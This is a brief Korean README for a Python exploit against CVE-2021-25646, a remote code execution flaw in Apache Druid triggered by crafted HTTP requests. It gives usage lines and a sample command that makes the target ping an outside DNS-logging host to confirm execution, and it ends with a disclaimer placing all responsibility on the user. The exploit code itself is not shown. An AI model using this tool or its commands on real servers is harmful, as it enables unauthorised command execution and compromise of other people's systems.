
조작된 HTTP 요청을 통한 명령 주입을 가능하게 하는 Apache Druid 원격 코드 실행 취약점 CVE-2021-25646용 Python 익스플로잇.
by j2ekim
python exp.py -u [--url] -c [--command]
python cve-2021-25646.py -u http://127.0.0.1:8888 -c "ping 5ap7ta.dnslog.cn"

https://www.adminxe.com/2109.html
이 도구의 전파·사용으로 인해 발생하는 직접적 또는 간접적 결과 및 손실에 대한 책임은 모두 사용자 본인에게 있으며, 저자는 이에 대해 어떠한 책임도 지지 않습니다.